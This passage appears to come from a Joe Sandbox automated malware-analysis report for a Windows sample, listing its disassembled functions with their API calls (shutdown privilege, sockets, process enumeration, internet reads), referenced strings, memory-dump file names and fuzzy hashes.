Opcode Fuzzy Hash: 9670d2849cb20f5d8433ea7cb3a0580545f433f6e74b5f9413b6d8bc48e42977
Instruction Fuzzy Hash: F63192710087959FC340FF64D891DAFB7EAAE92310F404E1DF4D592291EB21DA09CB67

Function 006851BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 006787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0067882B
Part of subcall function 006787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00678858
Part of subcall function 006787E1: GetLastError.KERNEL32 ref: 00678865

ExitWindowsEx.USER32(?,00000000), ref: 006851F9

Strings

@, xrefs: 006851EC
SeShutdownPrivilege, xrefs: 006851C9
, xrefs: 006851E7

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 1400f7a833b8e2beccd5dd053696030a7f14718961e0c640d84628a3c25578ec
Instruction ID: 25c64bdfecc8b5333dd49ca332beb94cbebd654d3aebbb5dced0e94f7d60b559
Opcode Fuzzy Hash: 1400f7a833b8e2beccd5dd053696030a7f14718961e0c640d84628a3c25578ec
Instruction Fuzzy Hash: 04014C316A16116BE72873649CBAFFA725BE705340F100625F843E21D2DD511D014790

Function 0062FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%k, xrefs: 0062FCF3
pbn, xrefs: 006649B9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbn$%k
API String ID: 3964851224-3545238419
Opcode ID: 4dafb4737306cd75928e835a6dbf177ce5f6d772bd2e9787223ddee1a773c807
Instruction ID: 6a8a45eadbe0b16aec760d7043a88da96fa4be65e89c16e962945c3a91109f34
Opcode Fuzzy Hash: 4dafb4737306cd75928e835a6dbf177ce5f6d772bd2e9787223ddee1a773c807
Instruction Fuzzy Hash: 98928C706087519FE724DF14C490B6AB7E2BF85304F14896DE88A8B352DB71EC49CF96

Function 00696283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 006962DC
WSAGetLastError.WSOCK32(00000000), ref: 006962EB
bind.WSOCK32(00000000,?,00000010), ref: 00696307
listen.WSOCK32(00000000,00000005), ref: 00696316
WSAGetLastError.WSOCK32(00000000), ref: 00696330
closesocket.WSOCK32(00000000), ref: 00696344

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 489d8d91019ffb36e52b72cfe4b380acd614d2c158f42a97e5e48d09d693fba2
Instruction ID: 4042f3219d4c5c8ae0888f8acc0b8054f212a14f338d2fd83f02bb1f822a7885
Opcode Fuzzy Hash: 489d8d91019ffb36e52b72cfe4b380acd614d2c158f42a97e5e48d09d693fba2
Instruction Fuzzy Hash: B421D0316006109FCF10EF64D885AAEB7BAEF49720F148159F856A73D1C770AD01CF65

Function 00635520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00640DB6: std::exception::exception.LIBCMT ref: 00640DEC
Part of subcall function 00640DB6: __CxxThrowException@8.LIBCMT ref: 00640E01

_memmove.LIBCMT ref: 00670258
_memmove.LIBCMT ref: 0067036D
_memmove.LIBCMT ref: 00670414

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: d8e54a6d7a3102f907f4e02b63cdd0eb17e53c63836dd88c024ea023696ec55f
Instruction ID: b6edbaf0e7b69a209991ad3efe746118b8eda1f47653486112c7922fd9918700
Opcode Fuzzy Hash: d8e54a6d7a3102f907f4e02b63cdd0eb17e53c63836dd88c024ea023696ec55f
Instruction Fuzzy Hash: A002BEB0E00619DBDF04DF64D982AAEBBB6EF44310F14806DE80ADB355EB31D951CBA5

Function 00621287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

DefDlgProcW.USER32(?,?,?,?,?), ref: 006219FA
GetSysColor.USER32(0000000F), ref: 00621A4E
SetBkColor.GDI32(?,00000000), ref: 00621A61

Part of subcall function 00621290: DefDlgProcW.USER32(?,00000020,?), ref: 006212D8

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: c5097ce347745b623c1d4d68430d08caae3fdfd3dda6cd6b3fe115215f3ad0d7
Instruction ID: faeff168ff9b75a139425bad54b8c4576929e4ff0c493328893a5ba204c6c130
Opcode Fuzzy Hash: c5097ce347745b623c1d4d68430d08caae3fdfd3dda6cd6b3fe115215f3ad0d7
Instruction Fuzzy Hash: 4CA17B7110AD74BAD738AB286C44EFF255FDB63342F14110DF902DD292CA229D429EB6

Function 006A5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 006A53C5
IsWindowEnabled.USER32 ref: 006A53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 006A53E0
IsIconic.USER32 ref: 006A53EE
IsZoomed.USER32 ref: 006A53FC

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 8d111d8623f9844e3cdab36536d08a3b85ea91dd4e910d9bacc374c0e842bfba
Instruction ID: ae51b62b2a59e743e7c66cc1a0a470ff3d1baf3f1b343cacd100d1df4dfb431a
Opcode Fuzzy Hash: 8d111d8623f9844e3cdab36536d08a3b85ea91dd4e910d9bacc374c0e842bfba
Instruction Fuzzy Hash: 0111E6317009215FDB20BF269C44A5A7BDBEF867A1B004428F846D3241DB74EC018EA5

Function 006780A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006780C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006780CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006780D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006780E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006780F6

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0a4d714d98111095989e475b630a1c351074ec31852dc77e19cf99b9786094bf
Instruction ID: 693a533e1b189f4335193aaed69cbcdbd547f92f25451012b6f6290cdb2b6bc0
Opcode Fuzzy Hash: 0a4d714d98111095989e475b630a1c351074ec31852dc77e19cf99b9786094bf
Instruction Fuzzy Hash: 57F06231250205AFEB101FA5EC8DEA73BAEEF4A755B404025F949C7250CB61AC51DE61

Function 0062E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Ddn, xrefs: 0062EABA
Ddn, xrefs: 00663AF5
Ddn, xrefs: 00663B2E
Variable must be of type 'Object'., xrefs: 00663E62
Ddn, xrefs: 0062EAC1

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID: Ddn$Ddn$Ddn$Ddn$Variable must be of type 'Object'.
API String ID: 0-1200142725
Opcode ID: 1297d3a1843d9d2e575df60e0bc024a64ab15fee076c6f677bbf8063c023f35f
Instruction ID: 57e4b25fe421dd3d7195954d4369801dd27187795053fb7451360dc1e8d48e88
Opcode Fuzzy Hash: 1297d3a1843d9d2e575df60e0bc024a64ab15fee076c6f677bbf8063c023f35f
Instruction Fuzzy Hash: 34A28C74A00A25CFCB24CF58E480AAAB7B3FF59310F648469E945AB351D736ED42CF91

Function 00624B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00624AD0), ref: 00624B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00624B57

Strings

kernel32.dll, xrefs: 00624B40
GetNativeSystemInfo, xrefs: 00624B51

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 507309feb58cc85d65f1614859f6098a098d94e013c9649f78789e26ace82255
Instruction ID: 047b6d1b590b73b647635d3e50bb0fc6ea27317dc929e13a1a0a9394e0245299
Opcode Fuzzy Hash: 507309feb58cc85d65f1614859f6098a098d94e013c9649f78789e26ace82255
Instruction Fuzzy Hash: EBD01234A10723CFD720AFB1E858B4676E6AF06351B118839D486D6250DA70EC80CE65

Function 0069EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0069EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0069EE4B

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Process32NextW.KERNEL32(00000000,?), ref: 0069EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0069EF1A

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 8e64b98aa082709b181c3f26648a7459a290921d024292d606cd79e570e4facc
Instruction ID: b97fc837f94d51839cb7af8b7dc567af98284886db40a3460e9365fd18e3bcaa
Opcode Fuzzy Hash: 8e64b98aa082709b181c3f26648a7459a290921d024292d606cd79e570e4facc
Instruction Fuzzy Hash: D4519D71504711AFD760EF20DC81EABB7E9EF84710F40482DF495972A1EB30A908CB96

Function 006967B7 Relevance: 6.1, APIs: 4, Instructions: 102networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WSOCK32(00000000), ref: 006967C7

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

bind.WSOCK32(?,?,00000010), ref: 00696800
WSAGetLastError.WSOCK32(00000000,?,?,00000010), ref: 0069680D
closesocket.WSOCK32 ref: 00696821

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfbindclosesocket
String ID:
API String ID: 4008321207-0
Opcode ID: 208014fb19dae02c42fa2e50230aed726415ad32513c32819da7f324db1a186f
Instruction ID: 24f1d6fe47db8dd80d9b0d274e7a21b29350ffbfe30055e58810adf6f2c52fb2
Opcode Fuzzy Hash: 208014fb19dae02c42fa2e50230aed726415ad32513c32819da7f324db1a186f
Instruction Fuzzy Hash: A8310775A00A105FDB90BF74EC82F3E73AA9F45714F44895CF5599B3C2CA245D018FA6

Function 0067E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0067E628

Strings

|, xrefs: 0067E658
(, xrefs: 0067E66E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 7492671c1c5e57ff21178ca821e6c4aafbd8333be680b8d707b22bc50710f710
Instruction ID: 1331a9d4d8f13975597bf675d084e7b5d80082bbcd0354badf5745c8e2f5760c
Opcode Fuzzy Hash: 7492671c1c5e57ff21178ca821e6c4aafbd8333be680b8d707b22bc50710f710
Instruction Fuzzy Hash: 87322575A007059FD728CF29C4819AAB7F2FF48310B15C4AEE99ADB3A1E771E941CB44

Function 006922EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0069180A,00000000), ref: 006923E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00692418

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: fa4e8b8c5c3b61ca6e5b4bf2c265674c708649571ab3cc92b72970790c505e27
Instruction ID: 834ce1e1606ca1ce3eefd7eaae75ce4f809f3b569b2a10a01df4a4818d93de8c
Opcode Fuzzy Hash: fa4e8b8c5c3b61ca6e5b4bf2c265674c708649571ab3cc92b72970790c505e27
Instruction Fuzzy Hash: 3041F47190420AFFEF109E95DC91EFB77FEEB40724F10402EF601A7A41DA749E419A64

Function 0068B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0068B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0068B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0068B3EA

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: ccc833b90e88b3e33452717245e08be77a93b93824c948a5d6a6db0344c8d544
Instruction ID: 3833add588da5c78f85cf63d6762cdcb7a7be24985f0665602ae664cd95440a1
Opcode Fuzzy Hash: ccc833b90e88b3e33452717245e08be77a93b93824c948a5d6a6db0344c8d544
Instruction Fuzzy Hash: C5217135A00518EFCB40EFA5D881AEDBBB9FF49310F1481AAE905AB351CB31AD15CF55

Function 006787E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00640DB6: std::exception::exception.LIBCMT ref: 00640DEC
Part of subcall function 00640DB6: __CxxThrowException@8.LIBCMT ref: 00640E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0067882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00678858
GetLastError.KERNEL32 ref: 00678865

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 67c9609bca86b3d9add1ab1b18f5bc7c6449eaa79a81e7b4e9e3d4e1ddc4227f
Instruction ID: 0e23f590f1be0bffb7e5c1c468c98c0c3e29b1e6f0874d1d01a8f0e0d70c7873
Opcode Fuzzy Hash: 67c9609bca86b3d9add1ab1b18f5bc7c6449eaa79a81e7b4e9e3d4e1ddc4227f
Instruction Fuzzy Hash: 891160B1814205AFE718EFA4DC89D6BB7BEEB45711B10852EE45997241DA30BC418B61

Function 0067874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00678774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0067878B
FreeSid.ADVAPI32(?), ref: 0067879B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 22efc697dd797eb4ea8c907821d7c49fae9a281ffd72cac6305375a69a442b0d
Instruction ID: bb3e5bea1fadbf6f54a43a76dad685fb08a76221dec83287593931da9d038ef2
Opcode Fuzzy Hash: 22efc697dd797eb4ea8c907821d7c49fae9a281ffd72cac6305375a69a442b0d
Instruction Fuzzy Hash: 6EF0627595130CBFDF04DFF4DC99ABEB7BDEF08201F104469A501E2181E7716A448B51

Function 00688889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0068889B

Part of subcall function 0064520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00688F6E,00000000,?,?,?,?,0068911F,00000000,?), ref: 00645213
Part of subcall function 0064520A: __aulldiv.LIBCMT ref: 00645233

Strings

0en, xrefs: 00688892

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0en
API String ID: 2893107130-1772810047
Opcode ID: cb349e4aa9173988cb6ace2780222855c3bb3f0f1af3f8c23a4bea9512741900
Instruction ID: de293552aa6530720e89f862100e18f30baac968aa5f1322bffb7d0ce4664a55
Opcode Fuzzy Hash: cb349e4aa9173988cb6ace2780222855c3bb3f0f1af3f8c23a4bea9512741900
Instruction Fuzzy Hash: F421A2726256108FC729CF25D881A92B3E2EBA5311B688F6CE1F5CF2C0CA74A905CB54

Function 00684C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00684CB3

Strings

DOWN, xrefs: 00684C98

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 828314e25f05694378d3a9be8e98c36853be3e300bf3a5635d11cd2b81f5651c
